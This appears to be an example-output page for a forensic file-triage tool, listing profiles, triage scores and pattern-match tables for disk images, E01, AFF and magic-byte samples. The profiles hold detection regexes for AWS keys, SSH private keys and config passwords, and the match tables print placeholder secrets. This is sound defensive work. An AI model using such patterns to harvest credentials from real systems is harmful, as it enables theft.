  pattern = "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,}"
  type = "regex"

Report outputs

No triage_report.json found in /home/kalabelt/dev/sus/examples/outputs/aff-forensic

CSV outputs

errors.csv

Empty CSV

files.csv

path	file_name	sha256	file_created	file_modified	file_accessed	mime_types_from_file_extension	is_extracted_file
/README.md	README.md	72dc854e4715b7d86c4ea6ac693d077cac9bf31c576eb1c2017afd596efe7394	2026-01-31T10:59:09.249752466Z	2026-01-31T10:59:09.249752466Z	2026-01-31T11:14:23.615342869Z	["application/x-genesis-rom"]	0
/sample.aff/sample.aff:aff:metadata	sample.aff:aff:metadata	f30fe1ec95972579e85a590996123c38368217b8ece820ea1d4da3dbd249f3be				[]	1
/sample.aff	sample.aff	c6dcd8213512d1f64ad6cf39d6bbae7770c022051a1ea9e4cbd00cf2c3b63496	2026-01-31T10:59:09.249752466Z	2026-01-31T10:59:09.249752466Z	2026-01-31T11:14:23.615342869Z	[]	0

pattern_matches.csv

id	sha256	pattern_name	match_type	match	location	length
1	72dc854e4715b7d86c4ea6ac693d077cac9bf31c576eb1c2017afd596efe7394	AFF Signature	bytes	AFF	2	3
2	72dc854e4715b7d86c4ea6ac693d077cac9bf31c576eb1c2017afd596efe7394	AFF Signature	bytes	AFF	71	3
3	72dc854e4715b7d86c4ea6ac693d077cac9bf31c576eb1c2017afd596efe7394	AFF Signature	bytes	AFF	146	3
4	72dc854e4715b7d86c4ea6ac693d077cac9bf31c576eb1c2017afd596efe7394	AFF Signature	bytes	AFF	158	3
5	72dc854e4715b7d86c4ea6ac693d077cac9bf31c576eb1c2017afd596efe7394	AFF Signature	bytes	AFF	411	3
6	72dc854e4715b7d86c4ea6ac693d077cac9bf31c576eb1c2017afd596efe7394	AFD Signature	bytes	AFD	419	3
7	72dc854e4715b7d86c4ea6ac693d077cac9bf31c576eb1c2017afd596efe7394	AFF Signature	bytes	AFF	424	3
8	72dc854e4715b7d86c4ea6ac693d077cac9bf31c576eb1c2017afd596efe7394	AFF Signature	bytes	AFF	493	3
9	72dc854e4715b7d86c4ea6ac693d077cac9bf31c576eb1c2017afd596efe7394	AFF Signature	bytes	AFF	529	3
10	72dc854e4715b7d86c4ea6ac693d077cac9bf31c576eb1c2017afd596efe7394	AFF Signature	bytes	AFF	1258	3
11	72dc854e4715b7d86c4ea6ac693d077cac9bf31c576eb1c2017afd596efe7394	AFF Signature	bytes	AFF	1274	3
12	72dc854e4715b7d86c4ea6ac693d077cac9bf31c576eb1c2017afd596efe7394	AFD Signature	bytes	AFD	1278	3
13	72dc854e4715b7d86c4ea6ac693d077cac9bf31c576eb1c2017afd596efe7394	AFF Signature	bytes	AFF	1468	3
14	72dc854e4715b7d86c4ea6ac693d077cac9bf31c576eb1c2017afd596efe7394	AFF Signature	bytes	AFF	1931	3
15	72dc854e4715b7d86c4ea6ac693d077cac9bf31c576eb1c2017afd596efe7394	AFF Signature	bytes	AFF	2218	3
16	f30fe1ec95972579e85a590996123c38368217b8ece820ea1d4da3dbd249f3be	AFF Signature	bytes	[65,70,70]	8	3
17	f30fe1ec95972579e85a590996123c38368217b8ece820ea1d4da3dbd249f3be	AFF Signature	bytes	[65,70,70]	357	3
18	f30fe1ec95972579e85a590996123c38368217b8ece820ea1d4da3dbd249f3be	AFF Signature	bytes	[65,70,70]	458	3
19	f30fe1ec95972579e85a590996123c38368217b8ece820ea1d4da3dbd249f3be	AFF Signature	bytes	[65,70,70]	581	3
20	c6dcd8213512d1f64ad6cf39d6bbae7770c022051a1ea9e4cbd00cf2c3b63496	AFF Signature	bytes	AFF	0	3
21	c6dcd8213512d1f64ad6cf39d6bbae7770c022051a1ea9e4cbd00cf2c3b63496	Password in Config	regex	password=secret123	1:791	530
22	c6dcd8213512d1f64ad6cf39d6bbae7770c022051a1ea9e4cbd00cf2c3b63496	Email Address	regex	test@example.com	1:519	16

signature_matches.csv

Empty CSV

unique_files.csv

sha256	sha1	md5	file_size	mime_type_for_content	shannon_entropy
72dc854e4715b7d86c4ea6ac693d077cac9bf31c576eb1c2017afd596efe7394	16a531a3dd2497cd89505b5146114808fac6f50c	740cc27c160aa0f35ae3bc0eedf6aecc	2405	text/plain	4.89741547802229
f30fe1ec95972579e85a590996123c38368217b8ece820ea1d4da3dbd249f3be	f6591a3387b0c5f6bf3b59103cd62b3b495e59b9	c5efea5354849c51bb5831f121a14cd0	799	text/plain	4.88908335822632
c6dcd8213512d1f64ad6cf39d6bbae7770c022051a1ea9e4cbd00cf2c3b63496	54bedfb39f8619237717ed61277380b6b7ae1d56	d7ed0ed6d2c12096d21c303c7270dfde	1321	application/octet-stream	0.310085889129748

Example: bytes-pattern

Inputs

examples/inputs/bytes-pattern-samples/sample.elf
examples/inputs/bytes-pattern-samples/sample.exe
examples/inputs/bytes-pattern-samples/sample.gif
examples/inputs/bytes-pattern-samples/sample.jpg
examples/inputs/bytes-pattern-samples/sample.pdf
examples/inputs/bytes-pattern-samples/sample.png
examples/inputs/bytes-pattern-samples/sample.zip

Profile

# Bytes Pattern Example Profile
# Demonstrates detection of file format magic bytes and binary patterns

decode = []

max-file-size = 10485760  # 10 MiB

tag = "bytes-pattern"

# Common file format magic bytes
[[patterns]]
  name = "PDF Header"
  pattern = "25:50:44:46"
  type = "bytes"

[[patterns]]
  name = "PNG Header"
  pattern = "89:50:4E:47:0D:0A:1A:0A"
  type = "bytes"

[[patterns]]
  name = "JPEG Header"
  pattern = "FF:D8:FF"
  type = "bytes"

[[patterns]]
  name = "GIF Header"
  pattern = "47:49:46:38"
  type = "bytes"

[[patterns]]
  name = "ZIP Header"
  pattern = "50:4B:03:04"
  type = "bytes"

[[patterns]]
  name = "RAR Header"
  pattern = "52:61:72:21:1A:07"
  type = "bytes"

[[patterns]]
  name = "7z Header"
  pattern = "37:7A:BC:AF:27:1C"
  type = "bytes"

[[patterns]]
  name = "ELF Header"
  pattern = "7F:45:4C:46"
  type = "bytes"

[[patterns]]
  name = "PE MZ Header"
  pattern = "4D:5A"
  type = "bytes"

[[patterns]]
  name = "Office 2007+ (OOXML)"
  pattern = "50:4B:03:04:14:00:06:00"
  type = "bytes"

# Suspicious binary patterns
[[patterns]]
  name = "Null Sled"
  pattern = "00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00"
  type = "bytes"

[[patterns]]
  name = "NOP Sled (x86)"
  pattern = "90:90:90:90:90:90:90:90"
  type = "bytes"

Report outputs

Triage report (converted from triage_report.json)

total_files	7
critical_count	0
high_count	0
medium_count	0
low_count	0
minimal_count	7
must_investigate_count	0
all_scores	None
generated_at	2025-12-03T09:19:43.962770608+00:00

top_scores

file_type	file_type_score	must_investigate	path	pattern_count_score	pattern_matches	reasons	risk_level	score	sha256
Executable	15	False	/sample.exe	5	1	["1 suspicious patterns detected"]	Minimal	20	d16ee5307c6e0496c864459af449e0c656e4d8e5bdfee83af451fb2dd7ff64a4
Archive	10	False	/sample.zip	5	1	["1 suspicious patterns detected"]	Minimal	15	56a388646e23dc611a253164567dcbea2ceb47e2ce09b7f8e68a19c7f6d9f5e2
Document	5	False	/sample.pdf	5	1	["1 suspicious patterns detected"]	Minimal	10	d0958bf2d40e26b2328c44773a9046034fb66ccdbabdb79d2d750bbeffdcfcdf
Other	0	False	/sample.jpg	5	1	["1 suspicious patterns detected"]	Minimal	5	b6ecc495cbd46cc09da3f32ebdb94a81712e1986bde12a8706f36fd6dcc8a098
Other	0	False	/sample.png	5	1	["1 suspicious patterns detected"]	Minimal	5	c42551b23e7594bfd846066c9c898cb611c17146ff79dfa892afeded01d3b735
Other	0	False	/sample.gif	5	1	["1 suspicious patterns detected"]	Minimal	5	5bb6b67a22ce0b967a1cf687f3d00bb8b433fcc39d298cde9a67597f258a4368
Other	0	False	/sample.elf	5	1	["1 suspicious patterns detected"]	Minimal	5	231c966fcf4e051785578a1cc41fd52e0ba3d56b72ebcdb2f68600c95fa927a5

CSV outputs

errors.csv

Empty CSV

files.csv

path	file_name	sha256	file_created	file_modified	file_accessed	mime_types_from_file_extension
/sample.zip	sample.zip	56a388646e23dc611a253164567dcbea2ceb47e2ce09b7f8e68a19c7f6d9f5e2	2025-12-03T08:56:20.495889189Z	2025-12-03T08:56:20.495889189Z	2025-12-03T08:56:20.495889189Z	["application/zip"]
/sample.jpg	sample.jpg	b6ecc495cbd46cc09da3f32ebdb94a81712e1986bde12a8706f36fd6dcc8a098	2025-12-03T08:56:20.495889189Z	2025-12-03T08:56:20.495889189Z	2025-12-03T08:56:20.495889189Z	["image/jpeg"]
/sample.png	sample.png	c42551b23e7594bfd846066c9c898cb611c17146ff79dfa892afeded01d3b735	2025-12-03T08:56:20.495889189Z	2025-12-03T08:56:20.495889189Z	2025-12-03T08:56:20.495889189Z	["image/png"]
/sample.gif	sample.gif	5bb6b67a22ce0b967a1cf687f3d00bb8b433fcc39d298cde9a67597f258a4368	2025-12-03T08:56:20.495889189Z	2025-12-03T08:56:20.495889189Z	2025-12-03T08:56:20.495889189Z	["image/gif"]
/sample.exe	sample.exe	d16ee5307c6e0496c864459af449e0c656e4d8e5bdfee83af451fb2dd7ff64a4	2025-12-03T08:56:20.495889189Z	2025-12-03T08:56:20.495889189Z	2025-12-03T08:56:20.495889189Z	["application/x-dosexec","application/x-dosexec","application/x-ms-ne-executable","application/vnd.microsoft.portable-executable"]
/sample.pdf	sample.pdf	d0958bf2d40e26b2328c44773a9046034fb66ccdbabdb79d2d750bbeffdcfcdf	2025-12-03T08:56:20.495889189Z	2025-12-03T08:56:20.495889189Z	2025-12-03T08:56:20.495889189Z	["application/pdf"]
/sample.elf	sample.elf	231c966fcf4e051785578a1cc41fd52e0ba3d56b72ebcdb2f68600c95fa927a5	2025-12-03T08:56:20.495889189Z	2025-12-03T08:56:20.495889189Z	2025-12-03T08:56:20.495889189Z	["application/x-executable"]

pattern_matches.csv

id	sha256	pattern_name	match_type	match	length
1	56a388646e23dc611a253164567dcbea2ceb47e2ce09b7f8e68a19c7f6d9f5e2	ZIP Header	bytes	PK	4
2	b6ecc495cbd46cc09da3f32ebdb94a81712e1986bde12a8706f36fd6dcc8a098	JPEG Header	bytes	��	3
3	c42551b23e7594bfd846066c9c898cb611c17146ff79dfa892afeded01d3b735	PNG Header	bytes	�PNG	8
4	5bb6b67a22ce0b967a1cf687f3d00bb8b433fcc39d298cde9a67597f258a4368	GIF Header	bytes	GIF8	4
5	d16ee5307c6e0496c864459af449e0c656e4d8e5bdfee83af451fb2dd7ff64a4	PE MZ Header	bytes	MZ	2
6	d0958bf2d40e26b2328c44773a9046034fb66ccdbabdb79d2d750bbeffdcfcdf	PDF Header	bytes	%PDF	4
7	231c966fcf4e051785578a1cc41fd52e0ba3d56b72ebcdb2f68600c95fa927a5	ELF Header	bytes	ELF	4

signature_matches.csv

Empty CSV

unique_files.csv

sha256	sha1	md5	file_size	mime_type_for_content	shannon_entropy
d16ee5307c6e0496c864459af449e0c656e4d8e5bdfee83af451fb2dd7ff64a4	fafd69e17d88a9ae35109fa3779319c4608aab70	a96dd69ec3fb1cdc5a3e3f294dae43e9	44	application/octet-stream	4.35327174447691
56a388646e23dc611a253164567dcbea2ceb47e2ce09b7f8e68a19c7f6d9f5e2	03807180f234ac4604b248483d674d3a9569a29b	1bbc604980f4148810b652723090d7f4	42	application/octet-stream	4.66935247095495
b6ecc495cbd46cc09da3f32ebdb94a81712e1986bde12a8706f36fd6dcc8a098	d37f332b2d81aa9c45807f10d17c0994d58f6533	0c908b4e1f9603e2f5923bb245178ced	34	image/jpeg	4.55805107654446
c42551b23e7594bfd846066c9c898cb611c17146ff79dfa892afeded01d3b735	cf896d9a3db62a00d319b059066913ad8341e8c4	014197e91280729f9d45a58b8e154196	44	image/png	4.57035399411994
5bb6b67a22ce0b967a1cf687f3d00bb8b433fcc39d298cde9a67597f258a4368	c764e4297f27a68e0c41836821094fc747c6d1a7	49752eea6c6ad2a78c6fb6aacda67556	48	image/gif	4.17609473185782
d0958bf2d40e26b2328c44773a9046034fb66ccdbabdb79d2d750bbeffdcfcdf	c32c560d7176d306a6064aa8d08eef2a1f3c3ea1	0c7faf0fa95a6884de094d634186f46d	73	application/pdf	4.30826328831621
231c966fcf4e051785578a1cc41fd52e0ba3d56b72ebcdb2f68600c95fa927a5	2ff43a51e0a70b5b1653438b1481c018944c1a5b	f1dab7b7b2f093a3283f36b4e8b9c598	41	application/x-executable	4.25951419952897

Example: commands-example

Inputs

No sample input files found for this example. (expected under /home/kalabelt/dev/sus/examples/inputs/commands-example-samples or /home/kalabelt/dev/sus/examples/inputs/commands-example)

Profile

# Example Profile: Command Execution
# This profile demonstrates the command execution features in sus
#
# Commands are organized into groups, with each group containing one or more
# inline commands. Group-level settings (os, arch, ignore-errors, etc.) are
# inherited by all commands in the group, but can be overridden per-command.

# Simple command group - runs on any platform
[[commands]]
  name = "Echo Test"
  ignore-errors = true
    [[commands.commands]]
      command = "echo 'Hello from sus profile'"

# OS-specific command groups
[[commands]]
  name = "Windows System Info"
  os = ["windows"]
  ignore-errors = true
  target = "local"
    [[commands.commands]]
      command = "systeminfo"

[[commands]]
  name = "Linux System Info"
  os = ["linux"]
  target = "local"
    [[commands.commands]]
      command = "uname -a"

[[commands]]
  name = "macOS System Info"
  os = ["macos"]
  target = "local"
    [[commands.commands]]
      command = "sw_vers"

# Command group with architecture filter
[[commands]]
  name = "x86_64 Specific"
  arch = ["x86-64"]
  ignore-errors = true
    [[commands.commands]]
      command = "echo 'Running on x86_64'"

# Command group with environment variables (inherited by all commands)
[[commands]]
  name = "Environment Test"
  os = ["linux", "macos"]
  env = [["CUSTOM_VAR", "custom_value"]]
  ignore-errors = true
    [[commands.commands]]
      command = "echo $CUSTOM_VAR"
    [[commands.commands]]
      command = "printenv CUSTOM_VAR"

# Command group with working directory
[[commands]]
  name = "List Temp Directory"
  os = ["linux", "macos"]
  working-dir = "/tmp"
  ignore-errors = true
    [[commands.commands]]
      command = "ls -la"

# Multiple commands in a group sharing settings
[[commands]]
  name = "Hardware Info"
  os = ["linux"]
  ignore-errors = true
    [[commands.commands]]
      command = "lscpu"
    [[commands.commands]]
      command = "free -h"
    [[commands.commands]]
      command = "df -h"

# Network information group
[[commands]]
  name = "Network Info"
  os = ["linux"]
  ignore-errors = true
    [[commands.commands]]
      command = "ip addr show"
    [[commands.commands]]
      command = "ip route show"

# Command group with a matrix - runs all commands for each OS/arch combination
[[commands]]
  name = "Cross-Platform Matrix"
  ignore-errors = true
    [commands.matrix]
      os = ["linux"]
      arch = ["x86-64"]
    [[commands.commands]]
      command = "uname -m"
    [[commands.commands]]
      command = "echo 'Platform-specific check'"

# Per-command overrides within a group
[[commands]]
  name = "Mixed Error Handling"
  ignore-errors = true
    [[commands.commands]]
      command = "echo 'This can fail'"
    [[commands.commands]]
      command = "critical-command"
      ignore-errors = false
    [[commands.commands]]
      command = "echo 'This also can fail'"

# Agent-targeted command group
[[commands]]
  name = "Agent Commands"
  os = ["linux"]
  target = "agent"
  ignore-errors = true
    [[commands.commands]]
      command = "hostname"
    [[commands.commands]]
      command = "uptime"

Report outputs

No outputs found for this example (expected: /home/kalabelt/dev/sus/examples/outputs/commands-example). Run the example to generate outputs.

Example: disk-image

Inputs

examples/inputs/disk-image-samples/README.md
examples/inputs/disk-image-samples/create_disk_image.sh
examples/inputs/disk-image-samples/sample.dd

Profile

# Disk Image Example Profile
# Demonstrates analysis of raw disk images (dd output) with MBR/GPT partition extraction

decode = ["base64"]

max-file-size = 104857600  # 100 MiB

tag = "disk-image"

# Patterns to match in files within partitions
[[patterns]]
  name = "AWS Access Key"
  pattern = "AKIA[0-9A-Z]{16}"
  type = "regex"

[[patterns]]
  name = "SSH Private Key"
  pattern = "-----BEGIN.*PRIVATE KEY-----"
  type = "regex"

[[patterns]]
  name = "Password in Config"
  pattern = "password\\s*=\\s*['\"]?[^'\"\\s]+"
  type = "regex"

[[patterns]]
  name = "MBR Boot Signature"
  pattern = "55:AA"
  type = "bytes"

[[patterns]]
  name = "GPT Signature"
  pattern = "45:46:49:20:50:41:52:54"  # "EFI PART"
  type = "bytes"

[[patterns]]
  name = "NTFS Signature"
  pattern = "4E:54:46:53"  # "NTFS"
  type = "bytes"

[[patterns]]
  name = "ext2/3/4 Signature"
  pattern = "53:EF"  # ext superblock magic
  type = "bytes"

Report outputs

Triage report (converted from triage_report.json)

total_files	10
critical_count	0
high_count	0
medium_count	0
low_count	1
minimal_count	9
must_investigate_count	0
all_scores	None
generated_at	2026-01-31T02:10:31.308029892+00:00

top_scores

file_type	file_type_score	must_investigate	path	pattern_count_score	pattern_matches	pattern_severity_score	reasons	risk_level	score	sha256
Script	20	False	/create_disk_image.sh	5	4	6	["4 suspicious patterns detected"]	Low	31	dfb12f805afad4c89f13823ea45b035144ae6437065b3a26aa03ec1f2c3e81ac
Configuration	10	False	config.ini/config.ini	5	1	0	["1 suspicious patterns detected"]	Minimal	15	5d74438e06c88aefcc1acfd904c8b8e2df7db0b5079abb81f7c75abcdae3ceeb
Other	0	False	/sample.dd/sample.dd:mbr:partition2:data/sample.dd:mbr:partition2:data.0	5	4	6	["4 suspicious patterns detected"]	Minimal	11	ba349d90730da40536076a47e076ee1803d22888d5189cefe9b1e0d32bab19dd
Other	0	False	credentials.txt/credentials.txt	5	2	3	["2 suspicious patterns detected"]	Minimal	8	98a7404a87384e9540beff68d83ff409a3169815538261ce8fb99527d65967b8
Other	0	False	id_rsa/id_rsa	5	1	0	["1 suspicious patterns detected"]	Minimal	5	a2a41ee356aacffeaeb40ef1cb66b46d95fe67324fbc2a77689aa7714c6733bf
Other	0	False	/sample.dd	5	1	0	["1 suspicious patterns detected"]	Minimal	5	e53052c8f329c474658ac808b9179ceb4b5da0cb25e5eb34284ecd353ea0801e
Other	0	False	/README.md	0	0	0	[]	Minimal	0	a408d059c3306caa127148c8d5cd00d8fe371cf4938ee9da0ad26efe4414f0a7
Other	0	False	/sample.dd/sample.dd:mbr:summary	0	0	0	[]	Minimal	0	f34394fe8799a6775273da2098478c1144dc81ab3ce17b5a9fe20e15655d5e6f
Other	0	False	/sample.dd/sample.dd:mbr:partition2:info	0	0	0	[]	Minimal	0	5abab32bc9baaa47add4ed8d0ffc7d37a9857bad28a7f4f438938df0c2a112dc
Other	0	False	/sample.dd/sample.dd:mbr:partition2:data	0	0	0	[]	Minimal	0	64f529d25fcca3ff3ca1ffe90bd078776a002727e46d34108f0e5ba0632f9f71

path	file_name	sha256	file_created	file_modified	file_accessed	mime_types_from_file_extension	is_extracted_file
/README.md	README.md	a408d059c3306caa127148c8d5cd00d8fe371cf4938ee9da0ad26efe4414f0a7	2026-01-31T01:53:56.77281481Z	2026-01-31T01:53:56.77281481Z	2026-01-31T01:54:14.280871854Z	["application/x-genesis-rom"]	0
/create_disk_image.sh	create_disk_image.sh	dfb12f805afad4c89f13823ea45b035144ae6437065b3a26aa03ec1f2c3e81ac	2026-01-31T01:53:56.77281481Z	2026-01-31T01:53:56.77281481Z	2026-01-31T01:54:14.280871854Z	["text/x-shellscript"]	0
/sample.dd/sample.dd:mbr:summary	sample.dd:mbr:summary	f34394fe8799a6775273da2098478c1144dc81ab3ce17b5a9fe20e15655d5e6f				[]	1
/sample.dd/sample.dd:mbr:partition2:info	sample.dd:mbr:partition2:info	5abab32bc9baaa47add4ed8d0ffc7d37a9857bad28a7f4f438938df0c2a112dc				[]	1
config.ini/config.ini	config.ini	5d74438e06c88aefcc1acfd904c8b8e2df7db0b5079abb81f7c75abcdae3ceeb		2026-01-31T01:38:09Z		[]	1
credentials.txt/credentials.txt	credentials.txt	98a7404a87384e9540beff68d83ff409a3169815538261ce8fb99527d65967b8		2026-01-31T01:38:09Z		["text/plain"]	1
id_rsa/id_rsa	id_rsa	a2a41ee356aacffeaeb40ef1cb66b46d95fe67324fbc2a77689aa7714c6733bf		2026-01-31T01:38:09Z		[]	1
/sample.dd/sample.dd:mbr:partition2:data/sample.dd:mbr:partition2:data.0	sample.dd:mbr:partition2:data.0	ba349d90730da40536076a47e076ee1803d22888d5189cefe9b1e0d32bab19dd				[]	1
/sample.dd/sample.dd:mbr:partition2:data	sample.dd:mbr:partition2:data	64f529d25fcca3ff3ca1ffe90bd078776a002727e46d34108f0e5ba0632f9f71				[]	1
/sample.dd	sample.dd	e53052c8f329c474658ac808b9179ceb4b5da0cb25e5eb34284ecd353ea0801e	2026-01-31T01:53:56.77281481Z	2026-01-31T01:53:56.803814538Z	2026-01-31T01:54:14.280871854Z	[]	0

pattern_matches.csv

id	sha256	pattern_name	match_type	match	location	length
1	dfb12f805afad4c89f13823ea45b035144ae6437065b3a26aa03ec1f2c3e81ac	AWS Access Key	regex	AKIAIOSFODNN7EXAMPLE	36:18	20
2	dfb12f805afad4c89f13823ea45b035144ae6437065b3a26aa03ec1f2c3e81ac	SSH Private Key	regex	-----BEGIN RSA PRIVATE KEY-----	55:0	31
3	dfb12f805afad4c89f13823ea45b035144ae6437065b3a26aa03ec1f2c3e81ac	Password in Config	regex	password=SuperSecret123!	38:9	24
4	dfb12f805afad4c89f13823ea45b035144ae6437065b3a26aa03ec1f2c3e81ac	Password in Config	regex	password="mysecretpassword	47:0	26
5	5d74438e06c88aefcc1acfd904c8b8e2df7db0b5079abb81f7c75abcdae3ceeb	Password in Config	regex	password="mysecretpassword	5:0	26
6	98a7404a87384e9540beff68d83ff409a3169815538261ce8fb99527d65967b8	AWS Access Key	regex	AKIAIOSFODNN7EXAMPLE	2:18	20
7	98a7404a87384e9540beff68d83ff409a3169815538261ce8fb99527d65967b8	Password in Config	regex	password=SuperSecret123!	4:9	24
8	a2a41ee356aacffeaeb40ef1cb66b46d95fe67324fbc2a77689aa7714c6733bf	SSH Private Key	regex	-----BEGIN RSA PRIVATE KEY-----	1:0	31
9	ba349d90730da40536076a47e076ee1803d22888d5189cefe9b1e0d32bab19dd	AWS Access Key	regex	AKIAIOSFODNN7EXAMPLE	11:18	20
10	ba349d90730da40536076a47e076ee1803d22888d5189cefe9b1e0d32bab19dd	SSH Private Key	regex	-----BEGIN RSA PRIVATE KEY-----	15:834	31
11	ba349d90730da40536076a47e076ee1803d22888d5189cefe9b1e0d32bab19dd	Password in Config	regex	password="mysecretpassword	5:0	26
12	ba349d90730da40536076a47e076ee1803d22888d5189cefe9b1e0d32bab19dd	Password in Config	regex	password=SuperSecret123!	13:9	24
13	e53052c8f329c474658ac808b9179ceb4b5da0cb25e5eb34284ecd353ea0801e	MBR Boot Signature	bytes	U�	510	2

signature_matches.csv

Empty CSV

unique_files.csv

sha256	sha1	md5	file_size	mime_type_for_content	shannon_entropy
a408d059c3306caa127148c8d5cd00d8fe371cf4938ee9da0ad26efe4414f0a7	546a1f2bdc4615acee5403743be2a69f59f32846	82bea8bcdc0202f9bad3c7e29c0ecb8d	1709	text/plain	5.1017954354414
dfb12f805afad4c89f13823ea45b035144ae6437065b3a26aa03ec1f2c3e81ac	7bab9570f251694ae7a4525576bd109803c89f83	714617c420a02932157efc597515c2b7	2208	text/x-shellscript	5.43331673755846
f34394fe8799a6775273da2098478c1144dc81ab3ce17b5a9fe20e15655d5e6f	4b3e650481da84189946ece639d7aa6433f0a5a9	4f4f5d86fd767001e821b6aca0137507	116	text/plain	4.83498904503428
5abab32bc9baaa47add4ed8d0ffc7d37a9857bad28a7f4f438938df0c2a112dc	28a24e597919e17ca9fb3dbfe3cf47de1a661805	018662367a81e2773e9f572ae53e1b8f	114	text/plain	4.89533483952472
5d74438e06c88aefcc1acfd904c8b8e2df7db0b5079abb81f7c75abcdae3ceeb	6bd25abe90d4fe10f97e003bca965a5ccd7b0ecb	05e5fc7db0897511e3e67e57da9f9ea1	169	text/plain	5.04359459472203
98a7404a87384e9540beff68d83ff409a3169815538261ce8fb99527d65967b8	29916fc6e0b432ea2dd85dbb09ab486cd92bb1ef	da3665dd2c7e870b74629a16a16f48d1	190	text/plain	5.47492289005644
a2a41ee356aacffeaeb40ef1cb66b46d95fe67324fbc2a77689aa7714c6733bf	80ef309bd6be9fdd50190c86ddccf6c6c3505f21	e5954e2dbd2a059e1c29f11af26c4c5e	184	application/x-pem-file	5.10836688223618
ba349d90730da40536076a47e076ee1803d22888d5189cefe9b1e0d32bab19dd	99c165aa33959d7b6744313440b3fcad7e1c08e2	224eac52786ec37e439b37ad162a3561	10240	application/x-tar	0.81729236591822
64f529d25fcca3ff3ca1ffe90bd078776a002727e46d34108f0e5ba0632f9f71	ca76dd8fa56634d936ff1cad2e412a03405357a1	6d860e860a5a967a45ae86ef3ffb3e1b	9437184	application/gzip	0.00133887163440445
e53052c8f329c474658ac808b9179ceb4b5da0cb25e5eb34284ecd353ea0801e	c5cff3d3fd98864413d4523da146ce4db2d9de83	707e4b6d17fdc383bcaed159676b8fb7	10485760	application/octet-stream	0.00124267704003298

Example: e01-forensic

Inputs

examples/inputs/e01-forensic-samples/README.md
examples/inputs/e01-forensic-samples/sample.E01

Profile

# E01 Forensic Image Example Profile
# Demonstrates analysis of E01 (Expert Witness Format / EnCase) forensic disk images

decode = ["base64"]

max-file-size = 104857600  # 100 MiB

tag = "e01-forensic"

# Patterns to match in E01 images and extracted partitions
[[patterns]]
  name = "E01 Signature"
  pattern = "45:56:46:09:0D:0A:FF:00"  # "EVF" signature
  type = "bytes"

[[patterns]]
  name = "AWS Access Key"
  pattern = "AKIA[0-9A-Z]{16}"
  type = "regex"

[[patterns]]
  name = "SSH Private Key"
  pattern = "-----BEGIN.*PRIVATE KEY-----"
  type = "regex"

[[patterns]]
  name = "Password in Config"
  pattern = "password\\s*=\\s*['\"]?[^'\"\\s]+"
  type = "regex"

[[patterns]]
  name = "MBR Boot Signature"
  pattern = "55:AA"
  type = "bytes"

[[patterns]]
  name = "GPT Signature"
  pattern = "45:46:49:20:50:41:52:54"  # "EFI PART"
  type = "bytes"

[[patterns]]
  name = "NTFS Signature"
  pattern = "4E:54:46:53"  # "NTFS"
  type = "bytes"

[[patterns]]
  name = "Email Address"
  pattern = "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,}"
  type = "regex"

Report outputs

Triage report (converted from triage_report.json)

total_files	4
critical_count	0
high_count	0
medium_count	0
low_count	0
minimal_count	4
must_investigate_count	0
all_scores	None
generated_at	2026-01-31T11:16:10.476841061+00:00

top_scores

file_type	must_investigate	path	pattern_count_score	pattern_matches	pattern_severity_score	reasons	risk_level	score	sha256
Other	False	/sample.E01	5	3	5	["3 suspicious patterns detected"]	Minimal	10	16b7e321137f3719320a3d844da38923eae1bc9f2134a10c8c56bc3682985c43
Other	False	/README.md	0	0	0	[]	Minimal	0	70a741fdc8fd57be0dbe105b6d92199126b9440343d201de42a5d65111e3025a
Other	False	/sample.E01/sample.E01:e01:metadata	0	0	0	[]	Minimal	0	9a46a57c78f9996e1549d33f1f1a02ea01639b871abab3b6e203b2c73c5dba99
Other	False	/sample.E01/sample.E01:e01:sections	0	0	0	[]	Minimal	0	859291139098c14d13d8bce18c2661100e6515bda7d384ca4b03f2ef67b0e2f2

path	file_name	sha256	file_created	file_modified	file_accessed	mime_types_from_file_extension	is_extracted_file
/README.md	README.md	70a741fdc8fd57be0dbe105b6d92199126b9440343d201de42a5d65111e3025a	2026-01-31T10:59:09.276752167Z	2026-01-31T10:59:09.276752167Z	2026-01-31T11:13:54.14750985Z	["application/x-genesis-rom"]	0
/sample.E01/sample.E01:e01:metadata	sample.E01:e01:metadata	9a46a57c78f9996e1549d33f1f1a02ea01639b871abab3b6e203b2c73c5dba99				[]	1
/sample.E01/sample.E01:e01:sections	sample.E01:e01:sections	859291139098c14d13d8bce18c2661100e6515bda7d384ca4b03f2ef67b0e2f2				[]	1
/sample.E01	sample.E01	16b7e321137f3719320a3d844da38923eae1bc9f2134a10c8c56bc3682985c43	2026-01-31T10:59:09.276752167Z	2026-01-31T10:59:09.276752167Z	2026-01-31T11:13:54.14750985Z	[]	0

pattern_matches.csv

id	sha256	pattern_name	match_type	match	location	length
1	16b7e321137f3719320a3d844da38923eae1bc9f2134a10c8c56bc3682985c43	E01 Signature	bytes	EVF �	0	8
2	16b7e321137f3719320a3d844da38923eae1bc9f2134a10c8c56bc3682985c43	Password in Config	regex	password=secret123	2:869	274
3	16b7e321137f3719320a3d844da38923eae1bc9f2134a10c8c56bc3682985c43	Email Address	regex	test@example.com	2:597	16

signature_matches.csv

Empty CSV

unique_files.csv

sha256	sha1	md5	file_size	mime_type_for_content	shannon_entropy
70a741fdc8fd57be0dbe105b6d92199126b9440343d201de42a5d65111e3025a	ed81dba87cf0c7d8422c123406673185cddbe505	5a9f9a9818d43cec1c6eed7af64328db	2220	text/plain	4.94692176785771
9a46a57c78f9996e1549d33f1f1a02ea01639b871abab3b6e203b2c73c5dba99	8406cb1cd0ef3aa12868db8513ebaea6aa9a884f	9aa1d45dc0ae3ed7edcf024010bd6334	830	text/plain	4.95453188643216
859291139098c14d13d8bce18c2661100e6515bda7d384ca4b03f2ef67b0e2f2	ce7b2ec567e74c335f98d6d8d490e39e34382144	7d74182dbff1c2ef700f49190df3f85f	294	text/plain	4.88598232057513
16b7e321137f3719320a3d844da38923eae1bc9f2134a10c8c56bc3682985c43	996863509a9c64701c8d2a28fe5193c45ab60560	484246f9115e0b0f3039c07aacba8c07	1147	application/octet-stream	0.449226489277724

Example: evtx

Inputs

examples/inputs/evtx-samples/event_logs.txt
examples/inputs/evtx-samples/sample_security.evtx

Profile

# Windows Event Log Parsing Example
# This demonstrates parsing real Windows Event Log (.evtx) files
# The sample_security.evtx file contains a minimal valid EVTX structure
# Use --parse-evtx CLI flag to parse the event log files

decode = []

tag = "evtx"

# Security event patterns
[[patterns]]
  name = "Logon Event 4624"
  pattern = "4624"
  type = "string"

